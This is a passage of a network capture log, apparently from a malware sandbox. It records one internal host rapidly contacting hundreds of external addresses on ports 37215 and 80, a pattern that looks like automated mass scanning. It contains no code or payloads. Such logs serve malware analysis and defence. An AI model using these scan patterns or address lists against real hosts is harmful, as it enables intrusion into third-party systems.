                                          Nov 7, 2024 11:57:59.439866066 CET3721530704156.51.43.110192.168.2.13
                                          Nov 7, 2024 11:57:59.439872026 CET228880192.168.2.1382.18.235.151
                                          Nov 7, 2024 11:57:59.439872026 CET228880192.168.2.1382.103.17.79
                                          Nov 7, 2024 11:57:59.439873934 CET228880192.168.2.1382.166.162.197
                                          Nov 7, 2024 11:57:59.439877033 CET3721530704156.91.240.162192.168.2.13
                                          Nov 7, 2024 11:57:59.439887047 CET3721530704156.44.161.246192.168.2.13
                                          Nov 7, 2024 11:57:59.439897060 CET3721530704156.172.220.8192.168.2.13
                                          Nov 7, 2024 11:57:59.439898014 CET228880192.168.2.1382.191.21.240
                                          Nov 7, 2024 11:57:59.439898014 CET228880192.168.2.1382.171.44.26
                                          Nov 7, 2024 11:57:59.439898968 CET228880192.168.2.1382.3.195.69
                                          Nov 7, 2024 11:57:59.439901114 CET3070437215192.168.2.13156.51.43.110
                                          Nov 7, 2024 11:57:59.439909935 CET3070437215192.168.2.13156.91.240.162
                                          Nov 7, 2024 11:57:59.439909935 CET3070437215192.168.2.13156.44.161.246
                                          Nov 7, 2024 11:57:59.439909935 CET228880192.168.2.1382.223.173.192
                                          Nov 7, 2024 11:57:59.439913988 CET3721530704156.98.226.199192.168.2.13
                                          Nov 7, 2024 11:57:59.439919949 CET228880192.168.2.1382.1.143.53
                                          Nov 7, 2024 11:57:59.439924955 CET3721530704156.23.58.133192.168.2.13
                                          Nov 7, 2024 11:57:59.439937115 CET228880192.168.2.1382.130.162.123
                                          Nov 7, 2024 11:57:59.439945936 CET3070437215192.168.2.13156.172.220.8
                                          Nov 7, 2024 11:57:59.439948082 CET228880192.168.2.1382.97.167.28
                                          Nov 7, 2024 11:57:59.439945936 CET3070437215192.168.2.13156.98.226.199
                                          Nov 7, 2024 11:57:59.439951897 CET3070437215192.168.2.13156.23.58.133
                                          Nov 7, 2024 11:57:59.439956903 CET228880192.168.2.1382.166.207.4
                                          Nov 7, 2024 11:57:59.439956903 CET228880192.168.2.1382.226.227.67
                                          Nov 7, 2024 11:57:59.439960003 CET228880192.168.2.1382.155.154.2
                                          Nov 7, 2024 11:57:59.439970016 CET3721530704156.155.194.17192.168.2.13
                                          Nov 7, 2024 11:57:59.439975977 CET228880192.168.2.1382.196.43.134
                                          Nov 7, 2024 11:57:59.439975977 CET228880192.168.2.1382.136.17.252
                                          Nov 7, 2024 11:57:59.439980030 CET3721530704156.84.93.235192.168.2.13
                                          Nov 7, 2024 11:57:59.439981937 CET228880192.168.2.1382.7.41.195
                                          Nov 7, 2024 11:57:59.439990044 CET3721530704156.47.201.0192.168.2.13
                                          Nov 7, 2024 11:57:59.439996958 CET3070437215192.168.2.13156.155.194.17
                                          Nov 7, 2024 11:57:59.439997911 CET228880192.168.2.1382.19.196.237
                                          Nov 7, 2024 11:57:59.440002918 CET3721530704156.151.193.245192.168.2.13
                                          Nov 7, 2024 11:57:59.440002918 CET228880192.168.2.1382.127.55.224
                                          Nov 7, 2024 11:57:59.440002918 CET3070437215192.168.2.13156.84.93.235
                                          Nov 7, 2024 11:57:59.440012932 CET3721530704156.153.142.180192.168.2.13
                                          Nov 7, 2024 11:57:59.440015078 CET228880192.168.2.1382.135.151.161
                                          Nov 7, 2024 11:57:59.440015078 CET228880192.168.2.1382.17.253.192
                                          Nov 7, 2024 11:57:59.440020084 CET228880192.168.2.1382.20.95.154
                                          Nov 7, 2024 11:57:59.440027952 CET3070437215192.168.2.13156.47.201.0
                                          Nov 7, 2024 11:57:59.440030098 CET228880192.168.2.1382.140.64.85
                                          Nov 7, 2024 11:57:59.440031052 CET3721530704156.11.67.4192.168.2.13
                                          Nov 7, 2024 11:57:59.440030098 CET3070437215192.168.2.13156.151.193.245
                                          Nov 7, 2024 11:57:59.440030098 CET228880192.168.2.1382.9.161.57
                                          Nov 7, 2024 11:57:59.440036058 CET228880192.168.2.1382.91.75.170
                                          Nov 7, 2024 11:57:59.440038919 CET3070437215192.168.2.13156.153.142.180
                                          Nov 7, 2024 11:57:59.440041065 CET228880192.168.2.1382.7.211.235
                                          Nov 7, 2024 11:57:59.440041065 CET3721530704156.93.187.173192.168.2.13
                                          Nov 7, 2024 11:57:59.440047026 CET228880192.168.2.1382.115.60.56
                                          Nov 7, 2024 11:57:59.440049887 CET228880192.168.2.1382.208.40.255
                                          Nov 7, 2024 11:57:59.440052032 CET3721530704156.112.86.138192.168.2.13
                                          Nov 7, 2024 11:57:59.440052986 CET228880192.168.2.1382.78.79.10
                                          Nov 7, 2024 11:57:59.440073967 CET228880192.168.2.1382.113.79.129
                                          Nov 7, 2024 11:57:59.440078974 CET3070437215192.168.2.13156.11.67.4
                                          Nov 7, 2024 11:57:59.440078974 CET3070437215192.168.2.13156.93.187.173
                                          Nov 7, 2024 11:57:59.440078974 CET228880192.168.2.1382.41.255.134
                                          Nov 7, 2024 11:57:59.440078974 CET228880192.168.2.1382.204.154.153
                                          Nov 7, 2024 11:57:59.440080881 CET228880192.168.2.1382.75.226.135
                                          Nov 7, 2024 11:57:59.440080881 CET3070437215192.168.2.13156.112.86.138
                                          Nov 7, 2024 11:57:59.440088034 CET228880192.168.2.1382.202.190.130
                                          Nov 7, 2024 11:57:59.440099001 CET228880192.168.2.1382.169.218.145
                                          Nov 7, 2024 11:57:59.440105915 CET228880192.168.2.1382.240.57.178
                                          Nov 7, 2024 11:57:59.440116882 CET228880192.168.2.1382.1.66.73
                                          Nov 7, 2024 11:57:59.440128088 CET228880192.168.2.1382.250.93.40
                                          Nov 7, 2024 11:57:59.440128088 CET228880192.168.2.1382.185.108.11
                                          Nov 7, 2024 11:57:59.440128088 CET228880192.168.2.1382.156.82.88
                                          Nov 7, 2024 11:57:59.440131903 CET228880192.168.2.1382.153.21.215
                                          Nov 7, 2024 11:57:59.440140009 CET228880192.168.2.1382.17.63.249
                                          Nov 7, 2024 11:57:59.440140009 CET228880192.168.2.1382.205.23.165
                                          Nov 7, 2024 11:57:59.440148115 CET228880192.168.2.1382.73.217.159
                                          Nov 7, 2024 11:57:59.440152884 CET228880192.168.2.1382.146.135.181
                                          Nov 7, 2024 11:57:59.440159082 CET228880192.168.2.1382.251.107.57
                                          Nov 7, 2024 11:57:59.440161943 CET228880192.168.2.1382.136.73.17
                                          Nov 7, 2024 11:57:59.440181971 CET228880192.168.2.1382.242.144.69
                                          Nov 7, 2024 11:57:59.440184116 CET228880192.168.2.1382.110.58.244
                                          Nov 7, 2024 11:57:59.440184116 CET228880192.168.2.1382.13.199.63
                                          Nov 7, 2024 11:57:59.440190077 CET228880192.168.2.1382.39.249.60
                                          Nov 7, 2024 11:57:59.440197945 CET228880192.168.2.1382.245.143.218
                                          Nov 7, 2024 11:57:59.440198898 CET228880192.168.2.1382.222.14.187
                                          Nov 7, 2024 11:57:59.440207005 CET228880192.168.2.1382.251.51.213
                                          Nov 7, 2024 11:57:59.440207005 CET228880192.168.2.1382.78.234.133
                                          Nov 7, 2024 11:57:59.440213919 CET228880192.168.2.1382.175.85.81
                                          Nov 7, 2024 11:57:59.440222979 CET228880192.168.2.1382.159.119.14
                                          Nov 7, 2024 11:57:59.440224886 CET228880192.168.2.1382.202.60.12
                                          Nov 7, 2024 11:57:59.440227032 CET228880192.168.2.1382.71.231.162
                                          Nov 7, 2024 11:57:59.440246105 CET228880192.168.2.1382.40.172.81
                                          Nov 7, 2024 11:57:59.440246105 CET228880192.168.2.1382.113.134.62
                                          Nov 7, 2024 11:57:59.440247059 CET228880192.168.2.1382.89.134.127
                                          Nov 7, 2024 11:57:59.440252066 CET228880192.168.2.1382.37.129.229
                                          Nov 7, 2024 11:57:59.440258980 CET228880192.168.2.1382.76.229.46
                                          Nov 7, 2024 11:57:59.440263033 CET228880192.168.2.1382.52.163.37
                                          Nov 7, 2024 11:57:59.440283060 CET228880192.168.2.1382.229.44.66
                                          Nov 7, 2024 11:57:59.440289974 CET228880192.168.2.1382.81.129.153
                                          Nov 7, 2024 11:57:59.440289974 CET228880192.168.2.1382.200.198.139
                                          Nov 7, 2024 11:57:59.440289974 CET228880192.168.2.1382.223.160.75
                                          Nov 7, 2024 11:57:59.440294981 CET228880192.168.2.1382.74.202.90
                                          Nov 7, 2024 11:57:59.440299988 CET228880192.168.2.1382.65.43.148
                                          Nov 7, 2024 11:57:59.440304995 CET228880192.168.2.1382.76.198.77
                                          Nov 7, 2024 11:57:59.440309048 CET228880192.168.2.1382.9.11.42
                                          Nov 7, 2024 11:57:59.440309048 CET228880192.168.2.1382.104.223.205
                                          Nov 7, 2024 11:57:59.440311909 CET228880192.168.2.1382.223.96.5
                                          Nov 7, 2024 11:57:59.440319061 CET228880192.168.2.1382.141.158.66
                                          Nov 7, 2024 11:57:59.440327883 CET228880192.168.2.1382.38.71.248
                                          Nov 7, 2024 11:57:59.440336943 CET228880192.168.2.1382.78.186.23
                                          Nov 7, 2024 11:57:59.440336943 CET228880192.168.2.1382.243.31.94
                                          Nov 7, 2024 11:57:59.440351009 CET228880192.168.2.1382.134.231.22
                                          Nov 7, 2024 11:57:59.440351963 CET228880192.168.2.1382.96.196.167
                                          Nov 7, 2024 11:57:59.440351963 CET228880192.168.2.1382.38.23.242
                                          Nov 7, 2024 11:57:59.440356016 CET228880192.168.2.1382.10.178.129
                                          Nov 7, 2024 11:57:59.440366030 CET228880192.168.2.1382.171.225.129
                                          Nov 7, 2024 11:57:59.440371037 CET228880192.168.2.1382.146.134.25
                                          Nov 7, 2024 11:57:59.440372944 CET228880192.168.2.1382.27.92.239
                                          Nov 7, 2024 11:57:59.440388918 CET228880192.168.2.1382.169.142.121
                                          Nov 7, 2024 11:57:59.440390110 CET228880192.168.2.1382.100.169.120
                                          Nov 7, 2024 11:57:59.440391064 CET228880192.168.2.1382.75.181.182
                                          Nov 7, 2024 11:57:59.440399885 CET228880192.168.2.1382.144.83.3
                                          Nov 7, 2024 11:57:59.440399885 CET228880192.168.2.1382.63.40.81
                                          Nov 7, 2024 11:57:59.440406084 CET228880192.168.2.1382.54.35.223
                                          Nov 7, 2024 11:57:59.440418959 CET228880192.168.2.1382.150.229.233
                                          Nov 7, 2024 11:57:59.440418959 CET228880192.168.2.1382.55.165.184
                                          Nov 7, 2024 11:57:59.440423965 CET228880192.168.2.1382.6.120.68
                                          Nov 7, 2024 11:57:59.440423965 CET228880192.168.2.1382.73.130.36
                                          Nov 7, 2024 11:57:59.440429926 CET228880192.168.2.1382.44.122.207
                                          Nov 7, 2024 11:57:59.440438986 CET228880192.168.2.1382.175.118.62
                                          Nov 7, 2024 11:57:59.440443039 CET228880192.168.2.1382.70.190.112
                                          Nov 7, 2024 11:57:59.440443039 CET228880192.168.2.1382.167.167.255
                                          Nov 7, 2024 11:57:59.440448046 CET228880192.168.2.1382.49.219.28
                                          Nov 7, 2024 11:57:59.440448046 CET228880192.168.2.1382.167.240.20
                                          Nov 7, 2024 11:57:59.440459967 CET228880192.168.2.1382.46.201.187
                                          Nov 7, 2024 11:57:59.440464973 CET228880192.168.2.1382.247.172.162
                                          Nov 7, 2024 11:57:59.440470934 CET228880192.168.2.1382.53.174.189
                                          Nov 7, 2024 11:57:59.440475941 CET228880192.168.2.1382.186.163.205
                                          Nov 7, 2024 11:57:59.440480947 CET3721530704156.147.212.239192.168.2.13
                                          Nov 7, 2024 11:57:59.440488100 CET228880192.168.2.1382.103.113.75
                                          Nov 7, 2024 11:57:59.440490961 CET228880192.168.2.1382.41.125.182
                                          Nov 7, 2024 11:57:59.440500975 CET3721530704156.97.80.103192.168.2.13
                                          Nov 7, 2024 11:57:59.440502882 CET228880192.168.2.1382.208.205.60
                                          Nov 7, 2024 11:57:59.440504074 CET228880192.168.2.1382.129.15.171
                                          Nov 7, 2024 11:57:59.440510988 CET228880192.168.2.1382.239.52.1
                                          Nov 7, 2024 11:57:59.440511942 CET3721530704156.90.8.233192.168.2.13
                                          Nov 7, 2024 11:57:59.440514088 CET228880192.168.2.1382.117.205.31
                                          Nov 7, 2024 11:57:59.440515041 CET228880192.168.2.1382.37.61.14
                                          Nov 7, 2024 11:57:59.440522909 CET3070437215192.168.2.13156.147.212.239
                                          Nov 7, 2024 11:57:59.440524101 CET3721530704156.67.107.6192.168.2.13
                                          Nov 7, 2024 11:57:59.440529108 CET228880192.168.2.1382.182.92.154
                                          Nov 7, 2024 11:57:59.440531015 CET228880192.168.2.1382.19.227.203
                                          Nov 7, 2024 11:57:59.440546036 CET3070437215192.168.2.13156.90.8.233
                                          Nov 7, 2024 11:57:59.440546036 CET228880192.168.2.1382.205.126.146
                                          Nov 7, 2024 11:57:59.440548897 CET228880192.168.2.1382.252.53.224
                                          Nov 7, 2024 11:57:59.440548897 CET3070437215192.168.2.13156.97.80.103
                                          Nov 7, 2024 11:57:59.440548897 CET228880192.168.2.1382.105.117.8
                                          Nov 7, 2024 11:57:59.440558910 CET3070437215192.168.2.13156.67.107.6
                                          Nov 7, 2024 11:57:59.440561056 CET228880192.168.2.1382.240.42.119
                                          Nov 7, 2024 11:57:59.440563917 CET228880192.168.2.1382.207.188.243
                                          Nov 7, 2024 11:57:59.440563917 CET228880192.168.2.1382.247.205.119
                                          Nov 7, 2024 11:57:59.440563917 CET228880192.168.2.1382.210.146.17
                                          Nov 7, 2024 11:57:59.440566063 CET228880192.168.2.1382.172.132.144
                                          Nov 7, 2024 11:57:59.440591097 CET228880192.168.2.1382.133.228.113
                                          Nov 7, 2024 11:57:59.440592051 CET3721530704156.29.160.49192.168.2.13
                                          Nov 7, 2024 11:57:59.440593004 CET228880192.168.2.1382.218.242.216
                                          Nov 7, 2024 11:57:59.440598011 CET228880192.168.2.1382.77.98.137
                                          Nov 7, 2024 11:57:59.440598011 CET228880192.168.2.1382.27.173.187
                                          Nov 7, 2024 11:57:59.440603018 CET3721530704156.147.163.95192.168.2.13
                                          Nov 7, 2024 11:57:59.440604925 CET228880192.168.2.1382.22.29.87
                                          Nov 7, 2024 11:57:59.440613031 CET3721530704156.15.130.19192.168.2.13
                                          Nov 7, 2024 11:57:59.440613985 CET228880192.168.2.1382.78.147.188
                                          Nov 7, 2024 11:57:59.440618038 CET228880192.168.2.1382.142.201.175
                                          Nov 7, 2024 11:57:59.440618992 CET228880192.168.2.1382.69.227.38
                                          Nov 7, 2024 11:57:59.440618992 CET3070437215192.168.2.13156.29.160.49
                                          Nov 7, 2024 11:57:59.440624952 CET3721530704156.125.167.43192.168.2.13
                                          Nov 7, 2024 11:57:59.440634012 CET228880192.168.2.1382.16.64.26
                                          Nov 7, 2024 11:57:59.440634966 CET3721530704156.81.61.116192.168.2.13
                                          Nov 7, 2024 11:57:59.440645933 CET3721530704156.246.13.152192.168.2.13
                                          Nov 7, 2024 11:57:59.440651894 CET3070437215192.168.2.13156.147.163.95
                                          Nov 7, 2024 11:57:59.440653086 CET3070437215192.168.2.13156.15.130.19
                                          Nov 7, 2024 11:57:59.440654993 CET3721530704156.225.251.171192.168.2.13
                                          Nov 7, 2024 11:57:59.440654993 CET228880192.168.2.1382.10.73.55
                                          Nov 7, 2024 11:57:59.440659046 CET3070437215192.168.2.13156.125.167.43
                                          Nov 7, 2024 11:57:59.440660000 CET228880192.168.2.1382.207.145.50
                                          Nov 7, 2024 11:57:59.440660000 CET228880192.168.2.1382.101.194.147
                                          Nov 7, 2024 11:57:59.440675974 CET3721530704156.252.122.79192.168.2.13
                                          Nov 7, 2024 11:57:59.440675974 CET228880192.168.2.1382.249.121.103
                                          Nov 7, 2024 11:57:59.440681934 CET228880192.168.2.1382.126.160.96
                                          Nov 7, 2024 11:57:59.440681934 CET3070437215192.168.2.13156.225.251.171
                                          Nov 7, 2024 11:57:59.440686941 CET3721530704156.30.79.47192.168.2.13
                                          Nov 7, 2024 11:57:59.440691948 CET228880192.168.2.1382.251.137.8
                                          Nov 7, 2024 11:57:59.440696955 CET3721530704156.253.150.248192.168.2.13
                                          Nov 7, 2024 11:57:59.440706015 CET3070437215192.168.2.13156.252.122.79
                                          Nov 7, 2024 11:57:59.440709114 CET3070437215192.168.2.13156.81.61.116
                                          Nov 7, 2024 11:57:59.440709114 CET228880192.168.2.1382.175.240.128
                                          Nov 7, 2024 11:57:59.440710068 CET3070437215192.168.2.13156.246.13.152
                                          Nov 7, 2024 11:57:59.440710068 CET228880192.168.2.1382.124.236.207
                                          Nov 7, 2024 11:57:59.440711021 CET3721530704156.177.159.75192.168.2.13
                                          Nov 7, 2024 11:57:59.440721035 CET3721530704156.207.150.255192.168.2.13
                                          Nov 7, 2024 11:57:59.440723896 CET228880192.168.2.1382.103.210.167
                                          Nov 7, 2024 11:57:59.440731049 CET3721530704156.6.191.18192.168.2.13
                                          Nov 7, 2024 11:57:59.440731049 CET3070437215192.168.2.13156.253.150.248
                                          Nov 7, 2024 11:57:59.440732002 CET3070437215192.168.2.13156.30.79.47
                                          Nov 7, 2024 11:57:59.440742016 CET3721530704156.110.229.23192.168.2.13
                                          Nov 7, 2024 11:57:59.440743923 CET228880192.168.2.1382.211.195.20
                                          Nov 7, 2024 11:57:59.440747023 CET3070437215192.168.2.13156.177.159.75
                                          Nov 7, 2024 11:57:59.440759897 CET3721530704156.176.105.246192.168.2.13
                                          Nov 7, 2024 11:57:59.440759897 CET228880192.168.2.1382.222.189.127
                                          Nov 7, 2024 11:57:59.440769911 CET3721530704156.20.59.58192.168.2.13
                                          Nov 7, 2024 11:57:59.440779924 CET3721530704156.238.48.64192.168.2.13
                                          Nov 7, 2024 11:57:59.440783024 CET228880192.168.2.1382.241.3.59
                                          Nov 7, 2024 11:57:59.440783978 CET228880192.168.2.1382.174.237.152
                                          Nov 7, 2024 11:57:59.440785885 CET228880192.168.2.1382.217.189.183
                                          Nov 7, 2024 11:57:59.440785885 CET3070437215192.168.2.13156.176.105.246
                                          Nov 7, 2024 11:57:59.440789938 CET3721530704156.213.195.176192.168.2.13
                                          Nov 7, 2024 11:57:59.440799952 CET3721530704156.73.46.147192.168.2.13
                                          Nov 7, 2024 11:57:59.440804958 CET3070437215192.168.2.13156.20.59.58
                                          Nov 7, 2024 11:57:59.440804958 CET3070437215192.168.2.13156.238.48.64
                                          Nov 7, 2024 11:57:59.440810919 CET3721530704156.17.186.133192.168.2.13
                                          Nov 7, 2024 11:57:59.440814972 CET3070437215192.168.2.13156.213.195.176
                                          Nov 7, 2024 11:57:59.440812111 CET228880192.168.2.1382.81.102.113
                                          Nov 7, 2024 11:57:59.440812111 CET3070437215192.168.2.13156.207.150.255
                                          Nov 7, 2024 11:57:59.440812111 CET228880192.168.2.1382.171.83.117
                                          Nov 7, 2024 11:57:59.440820932 CET228880192.168.2.1382.79.169.67
                                          Nov 7, 2024 11:57:59.440812111 CET3070437215192.168.2.13156.6.191.18
                                          Nov 7, 2024 11:57:59.440823078 CET3721530704156.51.135.64192.168.2.13
                                          Nov 7, 2024 11:57:59.440812111 CET3070437215192.168.2.13156.110.229.23
                                          Nov 7, 2024 11:57:59.440812111 CET228880192.168.2.1382.226.253.84
                                          Nov 7, 2024 11:57:59.440812111 CET228880192.168.2.1382.107.221.35
                                          Nov 7, 2024 11:57:59.440834999 CET3721530704156.153.166.35192.168.2.13
                                          Nov 7, 2024 11:57:59.440843105 CET228880192.168.2.1382.95.211.117
                                          Nov 7, 2024 11:57:59.440843105 CET3070437215192.168.2.13156.73.46.147
                                          Nov 7, 2024 11:57:59.440845013 CET3721530704156.39.206.180192.168.2.13
                                          Nov 7, 2024 11:57:59.440844059 CET228880192.168.2.1382.219.127.124
                                          Nov 7, 2024 11:57:59.440850973 CET3070437215192.168.2.13156.51.135.64
                                          Nov 7, 2024 11:57:59.440857887 CET3721530704156.60.184.140192.168.2.13
                                          Nov 7, 2024 11:57:59.440865993 CET3070437215192.168.2.13156.153.166.35
                                          Nov 7, 2024 11:57:59.440866947 CET3070437215192.168.2.13156.17.186.133
                                          Nov 7, 2024 11:57:59.440872908 CET228880192.168.2.1382.119.91.196
                                          Nov 7, 2024 11:57:59.440881968 CET3070437215192.168.2.13156.39.206.180
                                          Nov 7, 2024 11:57:59.440881968 CET228880192.168.2.1382.33.8.203
                                          Nov 7, 2024 11:57:59.440885067 CET228880192.168.2.1382.84.201.52
                                          Nov 7, 2024 11:57:59.440902948 CET3070437215192.168.2.13156.60.184.140
                                          Nov 7, 2024 11:57:59.440902948 CET228880192.168.2.1382.21.212.99
                                          Nov 7, 2024 11:57:59.440906048 CET228880192.168.2.1382.119.36.185
                                          Nov 7, 2024 11:57:59.440907955 CET228880192.168.2.1382.197.3.114
                                          Nov 7, 2024 11:57:59.440915108 CET228880192.168.2.1382.192.40.147
                                          Nov 7, 2024 11:57:59.440921068 CET228880192.168.2.1382.241.86.185
                                          Nov 7, 2024 11:57:59.440934896 CET228880192.168.2.1382.183.206.127
                                          Nov 7, 2024 11:57:59.440937996 CET228880192.168.2.1382.247.24.67
                                          Nov 7, 2024 11:57:59.440937996 CET228880192.168.2.1382.198.47.2
                                          Nov 7, 2024 11:57:59.440944910 CET228880192.168.2.1382.236.111.174
                                          Nov 7, 2024 11:57:59.440948009 CET228880192.168.2.1382.20.35.214
                                          Nov 7, 2024 11:57:59.440953970 CET228880192.168.2.1382.228.64.33
                                          Nov 7, 2024 11:57:59.440960884 CET228880192.168.2.1382.115.57.245
                                          Nov 7, 2024 11:57:59.440962076 CET228880192.168.2.1382.117.129.121
                                          Nov 7, 2024 11:57:59.440968990 CET228880192.168.2.1382.217.2.114
                                          Nov 7, 2024 11:57:59.440968990 CET228880192.168.2.1382.132.238.96
                                          Nov 7, 2024 11:57:59.440978050 CET228880192.168.2.1382.31.46.180
                                          Nov 7, 2024 11:57:59.440990925 CET228880192.168.2.1382.205.44.53
                                          Nov 7, 2024 11:57:59.440994024 CET228880192.168.2.1382.100.216.51
                                          Nov 7, 2024 11:57:59.440994024 CET228880192.168.2.1382.122.49.200
                                          Nov 7, 2024 11:57:59.441000938 CET228880192.168.2.1382.54.35.98
                                          Nov 7, 2024 11:57:59.441004038 CET228880192.168.2.1382.45.128.224
                                          Nov 7, 2024 11:57:59.441020012 CET228880192.168.2.1382.183.143.191
                                          Nov 7, 2024 11:57:59.441020012 CET228880192.168.2.1382.78.240.102
                                          Nov 7, 2024 11:57:59.441020966 CET228880192.168.2.1382.50.14.140
                                          Nov 7, 2024 11:57:59.441030025 CET228880192.168.2.1382.59.203.90
                                          Nov 7, 2024 11:57:59.441030979 CET228880192.168.2.1382.218.3.255
                                          Nov 7, 2024 11:57:59.441030979 CET228880192.168.2.1382.168.197.149
                                          Nov 7, 2024 11:57:59.441047907 CET228880192.168.2.1382.123.74.80
                                          Nov 7, 2024 11:57:59.441049099 CET228880192.168.2.1382.159.207.196
                                          Nov 7, 2024 11:57:59.441050053 CET228880192.168.2.1382.249.179.167
                                          Nov 7, 2024 11:57:59.441049099 CET228880192.168.2.1382.124.142.208
                                          Nov 7, 2024 11:57:59.441067934 CET228880192.168.2.1382.0.124.77
                                          Nov 7, 2024 11:57:59.441070080 CET228880192.168.2.1382.226.90.152
                                          Nov 7, 2024 11:57:59.441070080 CET228880192.168.2.1382.157.159.143
                                          Nov 7, 2024 11:57:59.441080093 CET228880192.168.2.1382.174.132.104
                                          Nov 7, 2024 11:57:59.441082001 CET228880192.168.2.1382.116.13.39
                                          Nov 7, 2024 11:57:59.441082954 CET228880192.168.2.1382.175.49.102
                                          Nov 7, 2024 11:57:59.441088915 CET228880192.168.2.1382.148.210.90
                                          Nov 7, 2024 11:57:59.441101074 CET228880192.168.2.1382.195.53.147
                                          Nov 7, 2024 11:57:59.441116095 CET228880192.168.2.1382.134.206.122
                                          Nov 7, 2024 11:57:59.441119909 CET228880192.168.2.1382.170.190.69
                                          Nov 7, 2024 11:57:59.441121101 CET228880192.168.2.1382.250.137.31
                                          Nov 7, 2024 11:57:59.441121101 CET228880192.168.2.1382.253.234.245
                                          Nov 7, 2024 11:57:59.441124916 CET228880192.168.2.1382.81.139.204
                                          Nov 7, 2024 11:57:59.441127062 CET228880192.168.2.1382.241.247.160
                                          Nov 7, 2024 11:57:59.441132069 CET228880192.168.2.1382.3.116.170
                                          Nov 7, 2024 11:57:59.441144943 CET228880192.168.2.1382.40.76.41
                                          Nov 7, 2024 11:57:59.441144943 CET228880192.168.2.1382.168.240.158
                                          Nov 7, 2024 11:57:59.441152096 CET228880192.168.2.1382.5.201.136
                                          Nov 7, 2024 11:57:59.441154003 CET228880192.168.2.1382.104.83.255
                                          Nov 7, 2024 11:57:59.441159964 CET228880192.168.2.1382.5.182.231
                                          Nov 7, 2024 11:57:59.441174984 CET228880192.168.2.1382.23.191.132
                                          Nov 7, 2024 11:57:59.441174984 CET228880192.168.2.1382.109.86.92
                                          Nov 7, 2024 11:57:59.441189051 CET228880192.168.2.1382.220.197.133
                                          Nov 7, 2024 11:57:59.441189051 CET228880192.168.2.1382.238.196.130
                                          Nov 7, 2024 11:57:59.441210032 CET228880192.168.2.1382.198.96.126
                                          Nov 7, 2024 11:57:59.441210985 CET228880192.168.2.1382.95.17.160
                                          Nov 7, 2024 11:57:59.441212893 CET228880192.168.2.1382.240.162.52
                                          Nov 7, 2024 11:57:59.441212893 CET228880192.168.2.1382.53.35.179
                                          Nov 7, 2024 11:57:59.441225052 CET3721530704156.78.53.112192.168.2.13
                                          Nov 7, 2024 11:57:59.441226959 CET228880192.168.2.1382.5.250.161
                                          Nov 7, 2024 11:57:59.441227913 CET228880192.168.2.1382.222.64.135
                                          Nov 7, 2024 11:57:59.441230059 CET228880192.168.2.1382.245.252.5
                                          Nov 7, 2024 11:57:59.441236973 CET228880192.168.2.1382.51.215.93
                                          Nov 7, 2024 11:57:59.441239119 CET228880192.168.2.1382.244.151.34
                                          Nov 7, 2024 11:57:59.441243887 CET3721530704156.103.221.216192.168.2.13
                                          Nov 7, 2024 11:57:59.441250086 CET228880192.168.2.1382.131.40.2
                                          Nov 7, 2024 11:57:59.441251993 CET228880192.168.2.1382.241.185.73
                                          Nov 7, 2024 11:57:59.441266060 CET228880192.168.2.1382.109.17.82
                                          Nov 7, 2024 11:57:59.441266060 CET228880192.168.2.1382.149.130.222
                                          Nov 7, 2024 11:57:59.441267967 CET3070437215192.168.2.13156.78.53.112
                                          Nov 7, 2024 11:57:59.441281080 CET228880192.168.2.1382.255.1.125
                                          Nov 7, 2024 11:57:59.441282988 CET3070437215192.168.2.13156.103.221.216
                                          Nov 7, 2024 11:57:59.441282988 CET228880192.168.2.1382.168.232.121
                                          Nov 7, 2024 11:57:59.441287041 CET228880192.168.2.1382.240.204.179
                                          Nov 7, 2024 11:57:59.441306114 CET3721530704156.241.167.134192.168.2.13
                                          Nov 7, 2024 11:57:59.441308022 CET228880192.168.2.1382.227.216.154
                                          Nov 7, 2024 11:57:59.441308022 CET228880192.168.2.1382.228.5.157
                                          Nov 7, 2024 11:57:59.441313028 CET228880192.168.2.1382.172.165.137
                                          Nov 7, 2024 11:57:59.441315889 CET3721530704156.66.45.27192.168.2.13
                                          Nov 7, 2024 11:57:59.441317081 CET228880192.168.2.1382.64.137.8
                                          Nov 7, 2024 11:57:59.441328049 CET3721530704156.128.44.129192.168.2.13
                                          Nov 7, 2024 11:57:59.441329956 CET228880192.168.2.1382.44.171.157
                                          Nov 7, 2024 11:57:59.441339016 CET3721530704156.199.251.60192.168.2.13
                                          Nov 7, 2024 11:57:59.441345930 CET228880192.168.2.1382.199.5.191
                                          Nov 7, 2024 11:57:59.441345930 CET228880192.168.2.1382.36.63.45
                                          Nov 7, 2024 11:57:59.441349030 CET3070437215192.168.2.13156.241.167.134
                                          Nov 7, 2024 11:57:59.441349983 CET3721530704156.47.157.43192.168.2.13
                                          Nov 7, 2024 11:57:59.441354036 CET228880192.168.2.1382.113.223.23
                                          Nov 7, 2024 11:57:59.441359997 CET228880192.168.2.1382.36.187.129
                                          Nov 7, 2024 11:57:59.441359997 CET3721530704156.243.180.98192.168.2.13
                                          Nov 7, 2024 11:57:59.441361904 CET3070437215192.168.2.13156.66.45.27
                                          Nov 7, 2024 11:57:59.441368103 CET3070437215192.168.2.13156.128.44.129
                                          Nov 7, 2024 11:57:59.441378117 CET3070437215192.168.2.13156.199.251.60
                                          Nov 7, 2024 11:57:59.441381931 CET228880192.168.2.1382.126.49.112
                                          Nov 7, 2024 11:57:59.441381931 CET228880192.168.2.1382.106.218.216
                                          Nov 7, 2024 11:57:59.441381931 CET228880192.168.2.1382.227.146.166
                                          Nov 7, 2024 11:57:59.441387892 CET228880192.168.2.1382.80.123.239
                                          Nov 7, 2024 11:57:59.441387892 CET3070437215192.168.2.13156.47.157.43
                                          Nov 7, 2024 11:57:59.441407919 CET3070437215192.168.2.13156.243.180.98
                                          Nov 7, 2024 11:57:59.441420078 CET228880192.168.2.1382.215.127.200
                                          Nov 7, 2024 11:57:59.441423893 CET228880192.168.2.1382.175.184.36
                                          Nov 7, 2024 11:57:59.441425085 CET228880192.168.2.1382.141.30.171
                                          Nov 7, 2024 11:57:59.441425085 CET228880192.168.2.1382.230.153.232
                                          Nov 7, 2024 11:57:59.441437960 CET228880192.168.2.1382.153.237.75
                                          Nov 7, 2024 11:57:59.441437960 CET3721530704156.210.1.132192.168.2.13
                                          Nov 7, 2024 11:57:59.441440105 CET228880192.168.2.1382.17.18.247
                                          Nov 7, 2024 11:57:59.441445112 CET228880192.168.2.1382.44.138.0
                                          Nov 7, 2024 11:57:59.441445112 CET228880192.168.2.1382.57.14.16
                                          Nov 7, 2024 11:57:59.441450119 CET3721530704156.180.255.178192.168.2.13
                                          Nov 7, 2024 11:57:59.441452980 CET228880192.168.2.1382.138.142.148
                                          Nov 7, 2024 11:57:59.441454887 CET228880192.168.2.1382.35.237.174
                                          Nov 7, 2024 11:57:59.441458941 CET3721530704156.168.206.177192.168.2.13
